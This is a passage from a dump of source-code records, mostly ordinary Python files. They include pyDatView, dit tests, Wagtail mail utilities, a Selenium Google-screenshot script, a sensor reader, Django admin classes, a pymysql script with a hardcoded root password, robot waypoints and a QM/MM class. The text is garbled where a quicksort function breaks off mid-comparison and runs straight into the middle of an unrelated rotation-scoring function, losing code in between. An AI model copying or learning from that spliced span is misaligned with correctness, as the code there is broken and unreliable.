do '/path/python pyDatView.py'\")\n print(\" You can try './pythonmac pyDatView.py', a script provided\")\n print(\" in this repository to detect the path (in some cases)\")\n print(\" \")\n print(\" You can find additional help in the file 'README.md'.\")\n print(\" \")\n print(\" For quick reference, here are some typical cases:\")\n print(\" - Your python was installed with 'brew', then likely use \")\n print(\" /usr/lib/Cellar/python/XXXXX/Frameworks/python.framework/Versions/XXXX/bin/pythonXXX\");\n print(\" - Your python is an anaconda python, use something like:\");\n print(\" /anaconda3/bin/python.app (NOTE: the '.app'!\")\n print(\" - You are using a python 2 version, you can use the system one:\")\n print(\" /Library/Frameworks/Python.framework/Versions/XXX/bin/pythonXXX\")\n print(\" /System/Library/Frameworks/Python.framework/Versions/XXX/bin/pythonXXX\")\n return\n\n frame = MainFrame()\n\n if (dataframe is not None) and (len(dataframe)>0):\n #import time\n #tstart = time.time()\n frame.load_df(dataframe)\n #tend = time.time()\n #print('PydatView time: ',tend-tstart)\n elif len(filenames)>0:\n frame.load_files(filenames,fileformat=None)\n app.MainLoop()\n\ndef cmdline():\n if len(sys.argv)>1:\n pydatview(filename=sys.argv[1])\n else:\n pydatview()\n","sub_path":"pydatview/pydatview.py","file_name":"pydatview.py","file_ext":"py","file_size_in_byte":30066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"409938114","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom nose.tools import *\n\nfrom six.moves import map, range, zip\n\nfrom dit.npdist import Distribution\nfrom dit.exceptions import *\n\nimport numpy as np\n\ndef test_init1():\n # Invalid initializations.\n assert_raises(InvalidDistribution, Distribution, [])\n assert_raises(InvalidDistribution, Distribution, [], [])\n Distribution([], [], sample_space=[(0,1)], validate=False)\n\ndef test_atoms():\n pmf = [.125, .125, .125, .125, .25, 0, .25]\n outcomes = ['000', '011', '101', '110', '222', '321', '333']\n d = Distribution(outcomes, pmf)\n\n atoms = outcomes\n assert_equal( list(d.atoms()), atoms)\n\n patoms = ['000', '011', '101', '110', '222', '333']\n assert_equal( list(d.atoms(patoms=True)), patoms)\n\n d = Distribution(outcomes, pmf, sample_space=outcomes + ['444'])\n atoms = outcomes + ['444']\n assert_equal( list(d.atoms()), atoms)\n\ndef test_zipped():\n pmf = [.125, .125, .125, .125, .25, 0, .25]\n outcomes = ['000', '011', '101', '110', '222', '321', '333']\n d = Distribution(outcomes, pmf)\n\n outcomes_, pmf_ = list(zip(*d.zipped()))\n d2 = Distribution(outcomes_, pmf_)\n assert_true(d.is_approx_equal(d2))\n\n outcomes_, pmf_ = list(zip(*d.zipped(mode='atoms')))\n d3 = Distribution(outcomes_, pmf_)\n assert_true(d.is_approx_equal(d3))\n\n outcomes_, pmf_ = list(zip(*d.zipped(mode='patoms')))\n d4 = Distribution(outcomes_, pmf_)\n d.make_sparse()\n np.testing.assert_allclose(d.pmf, d4.pmf)\n\ndef test_init2():\n # Cannot initialize with an iterator.\n # Must pass in a sequence for outcomes.\n outcomes = map(int, ['0','1','2','3','4'])\n pmf = [1/5] * 5\n assert_raises(TypeError, Distribution, outcomes, pmf)\n","sub_path":"dit/tests/test_npdist.py","file_name":"test_npdist.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"310231615","text":"import logging\n\nfrom django.conf import settings\nfrom django.core.mail import get_connection\nfrom django.core.mail.message import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import override\n\nfrom wagtail.admin.auth import users_with_page_permission\nfrom wagtail.core.models import PageRevision\nfrom wagtail.users.models import UserProfile\n\n\nlogger = logging.getLogger('wagtail.admin')\n\n\ndef send_mail(subject, message, recipient_list, from_email=None, **kwargs):\n \"\"\"\n Wrapper around Django's EmailMultiAlternatives as done in send_mail().\n Custom from_email handling and special Auto-Submitted header.\n \"\"\"\n if not from_email:\n if hasattr(settings, 'WAGTAILADMIN_NOTIFICATION_FROM_EMAIL'):\n from_email = settings.WAGTAILADMIN_NOTIFICATION_FROM_EMAIL\n elif hasattr(settings, 'DEFAULT_FROM_EMAIL'):\n from_email = settings.DEFAULT_FROM_EMAIL\n else:\n from_email = 'webmaster@localhost'\n\n connection = kwargs.get('connection', False) or get_connection(\n username=kwargs.get('auth_user', None),\n password=kwargs.get('auth_password', None),\n fail_silently=kwargs.get('fail_silently', None),\n )\n multi_alt_kwargs = {\n 'connection': connection,\n 'headers': {\n 'Auto-Submitted': 'auto-generated',\n }\n }\n mail = EmailMultiAlternatives(subject, message, from_email, recipient_list, **multi_alt_kwargs)\n html_message = kwargs.get('html_message', None)\n if html_message:\n mail.attach_alternative(html_message, 'text/html')\n\n return mail.send()\n\n\ndef send_notification(page_revision_id, notification, excluded_user_id):\n # Get revision\n revision = PageRevision.objects.get(id=page_revision_id)\n\n # Get list of recipients\n if notification == 'submitted':\n # Get list of publishers\n include_superusers = getattr(settings, 'WAGTAILADMIN_NOTIFICATION_INCLUDE_SUPERUSERS', True)\n recipients = users_with_page_permission(revision.page, 'publish', include_superusers)\n elif notification in ['rejected', 'approved']:\n # Get submitter\n recipients = [revision.user]\n else:\n return False\n\n # Get list of email addresses\n email_recipients = [\n recipient for recipient in recipients\n if recipient.email and recipient.pk != excluded_user_id and getattr(\n UserProfile.get_for_user(recipient),\n notification + '_notifications'\n )\n ]\n\n # Return if there are no email addresses\n if not email_recipients:\n return True\n\n # Get template\n template_subject = 'wagtailadmin/notifications/' + notification + '_subject.txt'\n template_text = 'wagtailadmin/notifications/' + notification + '.txt'\n template_html = 'wagtailadmin/notifications/' + notification + '.html'\n\n # Common context to template\n context = {\n \"revision\": revision,\n \"settings\": settings,\n }\n\n # Send emails\n sent_count = 0\n for recipient in email_recipients:\n try:\n # update context with this recipient\n context[\"user\"] = recipient\n\n # Translate text to the recipient language settings\n with override(recipient.wagtail_userprofile.get_preferred_language()):\n # Get email subject and content\n email_subject = render_to_string(template_subject, context).strip()\n email_content = render_to_string(template_text, context).strip()\n\n kwargs = {}\n if getattr(settings, 'WAGTAILADMIN_NOTIFICATION_USE_HTML', False):\n kwargs['html_message'] = render_to_string(template_html, context)\n\n # Send email\n send_mail(email_subject, email_content, [recipient.email], **kwargs)\n sent_count += 1\n except Exception:\n logger.exception(\n \"Failed to send notification email '%s' to %s\",\n email_subject, recipient.email\n )\n\n return sent_count == len(email_recipients)\n","sub_path":"wagtail/admin/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418661525","text":"import os\nimport numpy as np\nimport sys\nimport timeit\nfrom service import GetFeature as GetFeature\nfrom service import TrainingMethod as RFTrainer\nfrom service import Utils as Utils\n\nfeature = sys.argv[1]\nml = sys.argv[2]\nmethod = sys.argv[3]\nfold = int(sys.argv[4])\ntrees = int(sys.argv[5])\n\ndef main():\n # GetFeature.getFeature('./data/trian_po_set3298_for_ampep_sever.fasta',\n # './data/trian_po_set3298_for_ampep_sever.tsv', feature)\n # GetFeature.getFeature('./data/trian_ne_set9894_for_ampep_sever.fasta',\n # './data/trian_ne_set9894_for_ampep_sever.tsv', feature)\n utils = Utils.Utils('Train')\n posArray, posY = utils.readFeature(\n \"data/trian_po_set3298_for_ampep_sever.tsv\", 1)\n negArray, negY = utils.readFeature(\n \"data/trian_ne_set9894_for_ampep_sever.tsv\", 0)\n X = np.concatenate((posArray, negArray))\n y = np.concatenate((posY, negY))\n print(len(X), len(y))\n\n trainer = RFTrainer.Trainer(X, y)\n trainer.training(fold, trees, method)\n\nstart = timeit.default_timer()\nmain()\nstop = timeit.default_timer()\nprint('Time: ', stop - start)","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"317914241","text":"from logging import exception\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport webdriver_manager\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\n\r\nclass GoogleKeywordScreenshoter():\r\n def __init__(self, keyword, screenshots_dir):\r\n self.browser = webdriver.Chrome(ChromeDriverManager().install())\r\n self.keyword = keyword\r\n self.screenshots_dir = screenshots_dir\r\n\r\n def start(self):\r\n self.browser.get(\"https://google.com\")\r\n search_bar = self.browser.find_element_by_class_name(\"gLFyf\")\r\n search_bar.send_keys(self.keyword)\r\n search_bar.send_keys(Keys.ENTER)\r\n shitty_element = WebDriverWait(self.browser, 10).until(\r\n EC.presence_of_element_located((By.CLASS_NAME,\"g-blk\")))\r\n self.browser.execute_script(\r\n \"\"\"\r\n const shitty = arguments[0];\r\n shitty.parentElement.removeChild(shitty)\r\n \"\"\",\r\n shitty_element,\r\n )\r\n search_results = self.browser.find_elements_by_class_name(\"g\")\r\n for index, results in enumerate(search_results):\r\n results.screenshot(\r\n f\"{self.screenshots_dir}/{self.keyword}x{index}.png\")\r\n def finish(self):\r\n self.browser.quit()\r\n\r\ndomain_competitor = GoogleKeywordScreenshoter(\"buy domain\",\"screenshots\")\r\ndomain_competitor.start()\r\ndomain_competitor.finish() \r\n \r\n \r\n\r\n\r\n","sub_path":"selenium/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"461824739","text":"#python3\n\n#len_seq_in = int(input())\n\n#print(\"len_seq\",len_seq_in)\n\n#seq_in = list(map(int,(input()).split()))\n\n#print(\"seq_in\",seq_in)\n\n\ndef quick_sort(seq):\n\n#\tprint (\"seq being sorted\", seq)\n\n\tequal_pivot = []\n#\tprint(\"equal_pivot\",equal_pivot)\n\n\tless_pivot = []\n#\tprint(\"less_pivot\",less_pivot)\n\n\tgreater_pivot = []\n#\tprint(\"greater_pivot\",greater_pivot)\n\n\tlen_seq = len(seq)\n\n\tif len_seq>1:\n\n\t\tpivot = seq[0]\n#\t\tprint(\"pivot\", pivot)\n\n\t\tfor i in range(0,len_seq):\n#\t\t\tprint (\"seq[i]\",seq[i])\n\n\t\t\tif seq[i] j:\r\n total+=1\r\n print(total)\r\n if total > best[1]:\r\n best= [i,total]\r\n return best[0]\r\n\r\nif __name__ == \"__main__\":\r\n a = [2,3,1,4,0] \r\n print(bestRotation(a)) ","sub_path":"python/bestrotation.py","file_name":"bestrotation.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64459782","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 15 10:25:22 2017\n\n@author: AB053658\n\"\"\"\n\nimport urllib.request\nimport re\nimport os\nimport json\nimport logging\n\ndef _getArtfId(url):\n \"\"\" \n 输入:configcenter的url ,label标签的值\n 输出:dict Artf\n 用途:用来把ArtifactId标签页下的值。按第二级标签(ui)分类返回。db,ui,app,micro等9个类。没有这个标签页的填入默认值。\n \"\"\"\n comp_list = ['jdk','activiti','opts','zookeeper','solr','activemq','cas','tomcat','nginx']\n Artf = {}\n db = {}\n ui = {}\n micro ={}\n app = {}\n activiti = {'explorer':'activiti-explorer','rest':'activiti-webapp-rest'}\n mule_dm = {}\n mule_db = {}\n mule_app = {}\n envdata = {\n 'caretaker':'vm-caretaker',\n 'zookeeper':'zookeeper',\n 'solr':'solr',\n 'redis':'redis'\n }\n comp = {\n 'jdk':'jdk',\n 'activemq':'apache-activemq',\n 'mule':'mule',\n 'tomcat':'apache-tomcat',\n 'nginx':'nginx',\n 'cas': 'cas',\n 'opts': 'com.ebao.opts.shell'\n }\n urlOpen = urllib.request.urlopen(url)\n urlJson = urlOpen.read().decode('utf-8')\n urlData = json.loads(urlJson)\n for appkey,values in urlData.items():\n# print(appkey)\n appFlag = appkey.split('/')[2]\n if appFlag not in comp_list:\n if appFlag.lower() == 'ui':\n for key,value in values.items():\n ui[key] = value\n elif appFlag.lower() == 'microservice':\n for key,value in values.items():\n micro[value] = value\n elif appFlag.lower() == 'app':\n for key,value in values.items():\n app[key] = value\n db[key] = value\n elif appFlag.lower() == 'mule':\n for key,value in values.items():\n if key == 'mule_dm':\n mule_dm['mule_dm'] = value\n elif key == 'mule_app':\n mule_app['mule_app'] = value\n elif key == 'db':\n mule_db['mule'] = value\n Artf['ui'] = ui\n Artf['db'] = dict(db, **mule_db)\n Artf['app'] = app\n Artf['micro'] = micro \n Artf['comp'] = comp\n Artf['mule_dm'] = mule_dm\n Artf['activiti'] = activiti\n Artf['nginx'] = {'conf':'nginx-conf'}\n Artf['mule_app'] = mule_app\n Artf['envdata'] = envdata\n# print (Artf)\n return Artf\n\ndef _getConfig(appUrl):\n \"\"\"\n 输入:configcenter的url\n 输出:dict\n 用途:把URL返回的json数据写入一个dict\n \"\"\"\n\n appOpen = urllib.request.urlopen(appUrl)\n appJson = appOpen.read().decode('utf-8')\n appData = json.loads(appJson)\n allData = appData['data']\n print (type(allData))\n newData = {}\n for key, value in allData.items():\n newData[key] = value\n print (newData)\n return newData\n\ndef _init_count(Artf):\n \"\"\"\n 输入:Artf dict\n 输出:count dict\n 用途:把Artf字典下的二级key和值组合,作为新的key,值都初始化为0\n \"\"\"\n \n count = {}\n for type,dic in Artf.items():\n typeFlag = type\n print(\">>>>>>>>>>>>>>\"+type+\"<<<<<<<<<<<<<<<<\")\n print(typeFlag)\n for key in dic.keys():\n print(key)\n resultFlag = key + '_' + typeFlag\n count[resultFlag] = 0\n return count\n\n\ndef _serverList(configCenter,profile,label):\n \"\"\"\n 输入:configCenter,profile,label\n 输出:serverCon dict \n 用途:返回每台机器对应的服务列表。\n \"\"\"\n serverDict = _getData(configCenter,profile,'server',label)\n serverCon={}\n serverList=[]\n allserverList=[]\n for key,value in serverDict.items():\n if ',' in value:\n tempList = value.split(',')\n allserverList += tempList\n else:\n allserverList.append(value)\n for item in allserverList:\n if item not in serverList:\n serverList.append(item)\n for item in serverList:\n serverCon[item]=[]\n for key,value in serverDict.items():\n if ',' in value:\n tempList = value.split(',')\n for item in tempList:\n serverCon[item].append(key)\n else:\n serverCon[value].append(key)\n return serverCon\n\nif __name__ == '__main__':\n app_root='/home/tomcat'\n configCenter= 'http://10.5.74.116:7101/configs'\n profile='anbang_prod'\n label='main'\n application='server'\n url = configCenter + '?profile=' + profile + '&application='+ application + '&label='+ label\n url1 = configCenter+'/export' + '?profile=' +'ArtifactId' + '&application='+'*'+ '&label='+ label\n print(url1)\n \n\n\n# print(_getConfig(url))\n# Artf=_getArtfId(url1)\n# print(Artf)\n# print(_init_count(Artf))\n print()","sub_path":"salt/salttest.py","file_name":"salttest.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"28479722","text":"import os\nimport re\nimport glob\nfrom datetime import datetime as dt\n\nfrom raspi_logger.util import get_serial_number\nfrom raspi_logger import keywords\n\n\ndef _get_sensors(path):\n return glob.glob(path + '28-*')\n\n\ndef _get_temperature(sensor_path):\n with open(sensor_path + '/w1_slave', 'r') as f: \n c = f.read().split('\\n')\n \n m = re.match(r\"([0-9a-f]{2} ){9}t=([+-]?[0-9]+)\", c[1])\n if m:\n value = float(m.group(2)) / 1000.\n else:\n value = 'NaN'\n\n return value, '\\n'.join(c)\n\n\ndef read_sensor(path='/sys/bus/w1/devices/', omit_sensor=False, omit_keyword=False, sensor_conf={}):\n data = []\n\n # get the Raspi serial number\n versions = get_serial_number()\n\n # get sensor config\n #sensor_conf = conf.get('sensorBackends', {}).get('ds18b20', {})\n\n for p in _get_sensors(path):\n temperature, hextemp = _get_temperature(p)\n\n d = dict(\n value=temperature,\n tstamp=dt.now().isoformat(),\n identifier=os.path.basename(p),\n rawData=hextemp,\n sensorName=sensor_conf.get('alias', 'DS18B20')\n )\n\n # extend\n if not omit_keyword:\n # get the sensor config\n if p in sensor_conf:\n extra = sensor_conf[p]\n elif '_all_' in sensor_conf:\n extra = sensor_conf['_all_']\n else:\n extra = {}\n in_soil = extra.get(\"in_soil\", False)\n \n # add the correct variable and sensor information\n _uuid = keywords.SOIL_TEMPERATURE if in_soil else keywords.AIR_TEMPERATURE\n variable = dict(\n variableName='SOIL TEMPERATURE' if in_soil else 'AIR TEMPERATURE',\n gcmdURL=keywords.CONCEPT_URL.format(uuid=_uuid, fmt='xml'),\n gcmdUUID=_uuid\n )\n\n # update\n d.update(variable)\n\n if not omit_sensor:\n d.update(versions) \n\n data.append(d)\n \n # return\n return data\n\n\nif __name__ == '__main__':\n import fire\n fire.Fire(read_sensor)\n","sub_path":"raspi_logger/sensors/ds18b20.py","file_name":"ds18b20.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"632218444","text":"from setuptools import setup, find_packages\nfrom setuptools.command.install import install as _install\n\nclass Install(_install):\n def run(self):\n _install.run(self)\n import nltk\n try:\n nltk.corpus.stopwords.words(\"english\")\n except:\n nltk.download('stopwords')\n \nconfig = {\n 'name': 'landmark_ml',\n 'description': 'Machine learning library for the landmark set of tools',\n 'author': 'InferLink',\n 'url': 'https://github.com/inferlink/landmark-ml',\n 'download_url': 'https://github.com/inferlink/landmark-ml',\n 'author_email': 'developers@inferlink.com ',\n 'version': '0.1.1',\n 'license': 'GNU AGPL',\n 'packages': find_packages(),\n 'classifiers': [],\n 'install_requires' : ['nltk'],\n 'setup_requires' : ['nltk'],\n 'cmdclass':{'install': Install}\n}\n\nsetup(**config)","sub_path":"pypi_install_script/landmark_ml-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299090696","text":"from django.contrib import admin\n\nfrom .models import SnmpDevice, SnmpDeviceMessage, PingHistory\n\n# Register your models here.\n\nclass SnmpDeviceAdmin(admin.ModelAdmin):\n fields = [\n 'name', 'hostname', 'status', 'ping_mode', 'ping_port',\n 'snmp_template', 'snmp_port', 'snmp_community', 'snmp_system_contact',\n 'snmp_system_description', 'snmp_system_name', 'snmp_system_location',\n 'snmp_system_uptime','ping_last_seen', 'ping_last_tried',\n 'snmp_last_tried', 'snmp_last_poll', 'snmp_logged_on_users'\n ]\n\n readonly_fields = (\n 'ping_last_seen', 'ping_last_tried', 'snmp_last_tried',\n 'snmp_last_poll'\n )\n\n list_display = [\n 'name', 'hostname', 'snmp_logged_on_users'\n ]\n\n\nclass SnmpDeviceMessageAdmin(admin.ModelAdmin):\n fields = (\n 'snmp_device', 'status', 'message_choice', 'resolved', 'resolved_by'\n )\n\n\nclass PingHistoryAdmin(admin.ModelAdmin):\n fields = [\n 'snmp_device', 'online', 'timestamp'\n ]\n\n readonly_fields = [\n 'timestamp',\n ]\n\n list_display = [\n 'snmp_device', 'online', 'timestamp'\n ]\n\n\nadmin.site.register(SnmpDevice, SnmpDeviceAdmin)\nadmin.site.register(PingHistory, PingHistoryAdmin)\nadmin.site.register(SnmpDeviceMessage, SnmpDeviceMessageAdmin)\n","sub_path":"sentinel/device/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"193309907","text":"import pymysql\n\n\ndef login():\n db = pymysql.connect(host='192.168.72.130',\n port=3306,\n user='root',\n password='123456',\n database='zuoye4')\n\n # 得到一个可以执行SQL语句的光标对象\n cursor = db.cursor()\n # 执行SQL语句\n # 创建一个库\n cursor.execute(\"create database test_zuoye character set utf8;\")\n # 使用库\n cursor.execute(\"use test_zuoye;\")\n # 创建一个表\n cursor.execute(\"CREATE TABLE zuoye4(\"\n \"id INT auto_increment PRIMARY KEY,\"\n \"name CHAR(10) NOT NULL UNIQUE,\"\n \"age TINYINT NOT NULL); \")\n\n # 插入多条数据\n cursor.execute(\"insert into zuoye4(id,name,age) values(1,'huangxin',24), (2,'xiaoming',25), (3,'xiaohong',26);\")\n # 修改一条数据\n cursor.execute(\"update zuoye4 set age = '26' where id='2';\")\n # 删除一条数据\n cursor.execute(\"delete from zuoye4 where name = 'xiaohong';\")\n # 提交修改\n db.commit()\n # 关闭光标对象\n cursor.close()\n # 关闭数据库连接\n db.close()\n print(\"操作完成\")\n\n\ndef main():\n login()\n\n\nmain()\n\n\n","sub_path":"test_automatic/黄鑫作业/黄鑫作业4.py","file_name":"黄鑫作业4.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"165140682","text":"\n\nfrom point import *\nfrom orientation import *\n\n#MAP LOCATIONS:\n\n#ROOM 2:\n\n#Position = (x, y) = (-4.41, 3.57)\n#Orientation = (z, w) = (0.98, 0.19)\n\n# Goal points\n\nROOM1 = (Point(-4.31, 0.22), Orientation(0.990, 0.144))\nROOM2 = (Point(-3.29, 3.87), Orientation(0.982, 0.189))\nROOM3 = (Point(-3.59, 7.07), Orientation(0.954, 0.301))\nKITCHEN1 = (Point(0, -0.83), Orientation(-0.06, 0.998))\nKITCHEN2 = (Point(0.05, -0.12), Orientation(-0.239, 0.971))\nAFTER_PR2 = (Point(0.03, 0.57), Orientation(1, 0))\n\n# Waypoints\n\nPR2 = (Point(1.1, -0.49), Orientation(0.801, 0.598))\n\nROOM1_ENTRANCE = (Point(-2, 0.05), Orientation(1, 0))\nROOM1_EXIT = (Point(-2, -0.44), Orientation(0, 1))\nROOM1_HALLWAY = (Point(-1.33, 0.16), Orientation(-0.281, 0.960))\n#ROOM1_SPECIAL = (Point(), Orientation())\n\nROOM2_ENTRANCE = (Point(-1.88, 3.60), Orientation(1, 0))\nROOM2_EXIT = (Point(-1.95, 2.57), Orientation(-0.646, 0.763))\nROOM2_HALLWAY = (Point(-1.35, 3.32), Orientation(0.702, 0.712))\n\nROOM3_ENTRANCE = (Point(-2.11, 6.67), Orientation(1, 0))\nROOM3_EXIT = (Point(-1.97, 5.53), Orientation(-0.640, 0.769))\nROOM3_HALLWAY = (Point(-1.21, 6.02), Orientation(0.828, 0.560)) #x,y = -1.53, 6.77\n\n\n# PATHS\nPATH_WAYPOSES = {}\nPATH_WAYPOSES[(\"room1\", \"room2\")] = [ROOM1_EXIT, ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM2_ENTRANCE, ROOM2]\nPATH_WAYPOSES[(\"room1\", \"room3\")] = [ROOM1_EXIT, ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM3_HALLWAY, ROOM3_ENTRANCE, ROOM3]\nPATH_WAYPOSES[(\"room1\", \"kitchen1\")] = [ROOM1_EXIT, ROOM1_HALLWAY, KITCHEN1]\nPATH_WAYPOSES[(\"room1\", \"kitchen2\")] = [ROOM1_EXIT, ROOM1_HALLWAY, KITCHEN2]\n\nPATH_WAYPOSES[(\"room2\", \"room1\")] = [ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1]\nPATH_WAYPOSES[(\"room2\", \"room3\")] = [ROOM2_EXIT, ROOM2_HALLWAY, ROOM3_HALLWAY, ROOM3_ENTRANCE, ROOM3]\nPATH_WAYPOSES[(\"room2\", \"kitchen1\")] = [ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1_HALLWAY, KITCHEN1]\nPATH_WAYPOSES[(\"room2\", \"kitchen2\")] = [ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1_HALLWAY, KITCHEN2]\n\nPATH_WAYPOSES[(\"room3\", \"room1\")] = [ROOM3_EXIT, ROOM2_ENTRANCE, ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1]\nPATH_WAYPOSES[(\"room3\", \"room2\")] = [ROOM3_EXIT, ROOM2_ENTRANCE, ROOM2]\nPATH_WAYPOSES[(\"room3\", \"kitchen1\")] = [ROOM3_EXIT, ROOM2_ENTRANCE, ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1_HALLWAY, KITCHEN1]\nPATH_WAYPOSES[(\"room3\", \"kitchen2\")] = [ROOM3_EXIT, ROOM2_ENTRANCE, ROOM2_EXIT, ROOM1_ENTRANCE, ROOM1_HALLWAY, KITCHEN2]\n\nPATH_WAYPOSES[(\"kitchen\", \"after_pr2\")] = [PR2, AFTER_PR2]\nPATH_WAYPOSES[(\"kitchen\", \"room1\")] = [ROOM1_HALLWAY, ROOM1_ENTRANCE, ROOM1]\nPATH_WAYPOSES[(\"kitchen\", \"room2\")] = [ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM2_ENTRANCE, ROOM2]\nPATH_WAYPOSES[(\"kitchen\", \"room3\")] = [ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM3_HALLWAY, ROOM3_ENTRANCE, ROOM3]\n\nPATH_WAYPOSES[(\"pr2\", \"after_pr2\")] = [AFTER_PR2]\n\nPATH_WAYPOSES[(\"after_pr2\", \"room1\")] = [ROOM1_HALLWAY, ROOM1_ENTRANCE, ROOM1]\nPATH_WAYPOSES[(\"after_pr2\", \"room2\")] = [ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM2_ENTRANCE, ROOM2]\nPATH_WAYPOSES[(\"after_pr2\", \"room3\")] = [ROOM1_HALLWAY, ROOM2_HALLWAY, ROOM3_HALLWAY, ROOM3_ENTRANCE, ROOM3]\n\n\n#ROOM1_POSITION = {\"donatello\" : Point(0, 0), \"leonardo\" : Point(0, 0)}\n#ROOM1_ORIENTATION = {\"donatello\" : Orientation(0, 1), \"leonardo\" : Orientation(0, 1)}\n\n#ROOM2_POSITION = {\"donatello\" : (0, 0), \"leonardo\" : (0, 0)}\n#ROOM2_ORIENTATION = {\"donatello\" : Orientation(0, 1), \"leonardo\" : Orientation(0, 1)}\n\n#KITCHEN_POSITION = {\"donatello\" : (1.79, -0.57), \"leonardo\" : (1.25, -1.03)}\n#KITCHEN_ORIENTATION = {\"donatello\" : Orientation(0.9, 0.44), \"leonardo\" : Orientation(0.78, 0.63)}\n\n#PR2_POSITION = {\"donatello\" : (0.83, 0.44), \"leonardo\" : (0, 0)}\n#PR2_ORIENTATION = {\"donatello\" : Orientation(-0.63, 0.77), \"leonardo\" : Orientation(0, 1)}\n\n\n\n","sub_path":"src/waiter_locations.py","file_name":"waiter_locations.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"304247163","text":"import time\nimport numpy as np\nfrom TensorMol import *\nimport pickle\nimport random\nfrom ..Neuralnetwork import *\nfrom ..Comparm import GPARAMS\nfrom ..Base import *\nfrom ..MD import *\n\nfrom sys import stdout\nimport copy\nfrom parmed.amber import AmberParm\nfrom parmed.amber import AmberMdcrd\nfrom parmed.amber import Rst7\nfrom simtk.openmm import *\nfrom simtk.openmm.app import *\nfrom simtk.unit import *\nfrom .NNcal import*\nfrom .DFTBcal import * \nfrom .Basestruc import *\nfrom ..Comparm import *\n\nclass FullQM_System_Amber:\n def __init__(self,prmname='',crdname='',Path='./',Inpath='./',Name=\"\"):\n self.prmname=prmname\n self.crdname=crdname \n self.name=Name\n self.qmcutoff=GPARAMS.Compute_setting.Qmradius\n self.Theroylevel=GPARAMS.Compute_setting.Theroylevel\n self.Path=Path\n if not os.path.exists(self.Path):\n os.system(\"mkdir %s\"%self.Path)\n self.Inpath=Inpath\n if not os.path.exists(self.Inpath):\n os.system(\"mkdir %s\"%self.Inpath)\n self.step=0\n self.err_step=0\n self.Get_prmtop_info()\n if self.crdname!='':\n self.Get_init_coord()\n self.FullMMparm=copy.deepcopy(self.prmtop)\n mmsys=self.FullMMparm.createSystem(nonbondedMethod=NoCutoff,rigidWater=False)\n integrator=LangevinIntegrator(300*kelvin,1/picosecond,0.00001*picoseconds)\n self.MMsimulation=Simulation(self.FullMMparm.topology,mmsys,integrator)\n def Get_init_coord(self):\n self.coords=coords_from_rst7_AMBER(self.crdname,self.natom)\n def Get_prmtop_info(self):\n self.prmtop=AmberParm(self.prmname)\n self.natom=len(self.prmtop.atoms)\n self.nres=len(self.prmtop.residues)\n atomname=self.prmtop.parm_data[\"ATOM_NAME\"]\n eleindex=self.prmtop.parm_data['ATOMIC_NUMBER']\n atomcrg=self.prmtop.parm_data['CHARGE']\n self.totalcharge=round(np.sum(atomcrg))\n self.atoms=np.array(eleindex)\n self.respts=np.array(self.prmtop.parm_data['RESIDUE_POINTER'])-1\n respte=self.prmtop.parm_data['RESIDUE_POINTER'][1:]\n respte.append(self.natom+1)\n self.respte=np.array(respte)-2\n self.rescrg=np.zeros(self.nres) \n for i in range(self.nres):\n self.rescrg[i]=round(np.sum(atomcrg[self.respts[i]:self.respte[i]+1]))\n print (self.rescrg)\n def Create_DisMap(self):\n d1=np.zeros((self.natom,self.natom),dtype=float)\n np.fill_diagonal(d1,0.00000000001)\n self.Dgraph=tf.Graph()\n with self.Dgraph.as_default():\n self.tfcrd=tf.placeholder(shape=[self.natom,3],dtype=tf.float64,name='coordinate')\n self.tfR=tf.reshape(tf.reduce_sum(self.tfcrd*self.tfcrd,1),[-1,1])\n self.tfDM=tf.sqrt(self.tfR-2*tf.matmul(self.tfcrd,tf.transpose(self.tfcrd))\\\n +tf.transpose(self.tfR)+tf.constant(d1))\n self.Dsess=tf.Session(graph=self.Dgraph)\n \n def Update_DisMap(self):\n self.Distance_Matrix=self.Dsess.run(self.tfDM,{self.tfcrd:self.coords})\n return \n\n def Cal_EFQ(self):\n self.step+=1\n self.force=np.zeros((self.natom,3))\n 